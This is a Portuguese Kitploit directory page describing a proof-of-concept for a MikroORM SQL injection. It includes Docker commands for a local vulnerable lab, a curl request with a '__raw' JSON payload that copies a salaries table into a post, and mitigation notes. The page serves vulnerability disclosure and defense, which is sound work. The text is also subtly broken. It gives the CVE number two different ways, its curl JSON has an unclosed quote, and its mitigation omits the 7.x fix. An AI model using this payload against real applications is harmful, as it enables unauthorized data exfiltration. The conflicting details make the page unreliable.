Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-34220 — Vulnerabilidade de SQL Injection no MikroORM | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2026-34220
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de Dados
GitHubeqstlab/cve-2026-34220

CVE-2026-34220

Vulnerabilidade de SQL Injection no MikroORM

Ver Repositório
19há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-43220 Injeção SQL no MikroORM

★ PoC de Injeção SQL no MikroORM CVE-2026-43220 ★

https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1


Visão Geral

CVE-2026-43220 é uma vulnerabilidade de Injeção SQL no MikroORM, um framework ORM amplamente utilizado em TypeScript/Node.js.
Quando um valor fornecido pelo usuário contendo uma propriedade __raw é passado para uma coluna de Tipo Personalizado sem validação, a verificação isRaw() do MikroORM o identifica como uma expressão Raw SQL interna confiável e insere o valor sql controlado pelo atacante diretamente na consulta gerada, sem conversão de tipo ou sanitização, causando execução não intencional de SQL arbitrário.


Versões Afetadas

Baixar ferramenta
CategoriaVersão
VulnerávelMikroORM versão ≤ 6.4.3 & 7.0.0 ≤ versão ≤ 7.0.5
CorrigidaMikroORM 6.4.4 & 7.0.6

Impacto

  • Exfiltração de dados sensíveis do banco de dados sem autorização
  • Corrupção ou modificação não intencional de registros existentes no banco de dados

Ambiente

root@kitploit:~
docker build -t cve-2026-43220-mikroorm-vuln .
docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln

PoC

Após iniciar o ambiente vulnerável, siga os passos abaixo para reproduzir o ataque.

Passo 1. Envie uma requisição com um payload malicioso contendo __raw

Envie um corpo JSON que inclua uma propriedade __raw direcionada a uma coluna de Tipo Personalizado.

root@kitploit:~
curl -X POST http://localhost:3000/write \
  -H "Content-Type: application/json" \
  -d '{
    "author":"x",
    "title":"x,
    "content": {
      "__raw": true,
      "sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)"
    }
  }'

Passo 2. Verifique a resposta HTTP

Confirme que a API retorna uma resposta bem-sucedida sem qualquer erro, indicando que o MikroORM aceitou o payload malicioso como um valor válido.

Passo 3. Confirme que dados sensíveis foram exfiltrados para o conteúdo do post

Verifique que o campo content do post criado contém o resultado da consulta da tabela salaries (por exemplo, Alice: 5000 / Bob: 7000 / ...), confirmando que dados de uma tabela não relacionada foram silenciosamente incorporados na resposta sem qualquer erro ou violação de controle de acesso.


Mitigação

  • Atualize para o MikroORM 6.4.4 ou posterior, que introduz verificação de origem em isRaw() para rejeitar propriedades __raw fornecidas externamente
  • Aplique validação de entrada baseada em whitelist para rejeitar propriedades inesperadas como __raw antes de passar valores para a camada ORM

Análise

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained
  • EN: https://www.skshieldus.com/en/report?tab=eqst